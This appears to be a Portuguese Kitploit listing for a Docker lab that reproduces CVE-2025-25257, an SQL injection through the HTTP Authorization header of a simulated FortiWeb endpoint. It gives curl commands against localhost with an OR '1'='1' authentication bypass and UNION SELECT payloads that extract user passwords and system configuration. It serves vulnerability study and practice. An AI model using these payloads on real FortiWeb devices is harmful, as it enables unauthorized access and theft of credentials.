Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2025-25257 — Laboratório Docker reproduzível para CVE-2025-25257, demonstrando bypass de injeção de SQL e exfiltração de dados via cabeçalho de Autorização HTTP em um endpoint FortiWeb simulado. | Kitploit
Ferramentas/GitHubGitHub/lytianahkone-boop/cve-2025-25257
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoSegurança de Banco de DadosLabs e Prática
GitHublytianahkone-boop/cve-2025-25257

cve-2025-25257

Laboratório Docker reproduzível para CVE-2025-25257, demonstrando bypass de injeção de SQL e exfiltração de dados via cabeçalho de Autorização HTTP em um endpoint FortiWeb simulado.

Ver Repositório
2há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-25257 - Ambiente de Experimentação

Arquitetura da Experimentação (o ambiente simula os componentes vulneráveis do FortiWeb)

root@kitploit:~
Endpoint vulnerável: /api/system/fabric/config
Vetor de injeção: Cabeçalho HTTP Authorization: Bearer
Mecanismo: Concatenação SQL direta (f-string Python)
Autenticação: Nenhuma (bypass total)
Banco de dados: SQLite (para demonstração)

cve-2025-25257

├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── app.py
├── init_db.py
├── payload.txt
└── README.md

Dockerfile: serviço http intencionalmente vulnerável / expõe uma API explorável sem autenticação

docker-compose.yml: orquestra um serviço vulnerável reproduzível / expõe a API atacável via http / isola o ambiente de experimentação

requirements.txt: garante um ambiente estável e reproduzível

app.py: implementa um endpoint pré-autenticação / aceita uma entrada do usuário via Authorization / concatena essa entrada em uma consulta SQL / permite o bypass de autenticação e a extração de dados

init_db.py: prepara um conjunto de dados explorável / permite uma demonstração clara do bypass de autenticação e da exfiltração de dados

payload.txt fornece uma prova mínima, controlada e observável de execução de código

Etapa 1: Construir e iniciar o contêiner

Construção da imagem Docker

docker-compose build

Inicialização do contêiner

docker-compose up -d

Verificar se o contêiner está ativo

docker-compose ps

Consultar os logs

docker-compose logs -f

Etapa 2: Verificar a acessibilidade do serviço

curl http://localhost:8080/api/system/status

Etapa 3: Exploração da vulnerabilidade

Requisição não maliciosa

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer valid_token_001"

Injeção de requisição SQL maliciosa com bypass OR 1=1

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' OR '1'='1"

Extração de dados com injeção UNION-SELECT

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, username, password, role, email, NULL FROM users--"

Exfiltração de dados sensíveis

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, key, value, description, '2025-01-01',NULL FROM system_config--"

Etapa 4: Limpeza e Encerramento

Parar o contêiner

docker-compose down

Remover os volumes

docker-compose down -v

Remover a imagem

docker rmi cve-2025-25257-lab-fortiweb-vulnerable:latest

Baixar ferramenta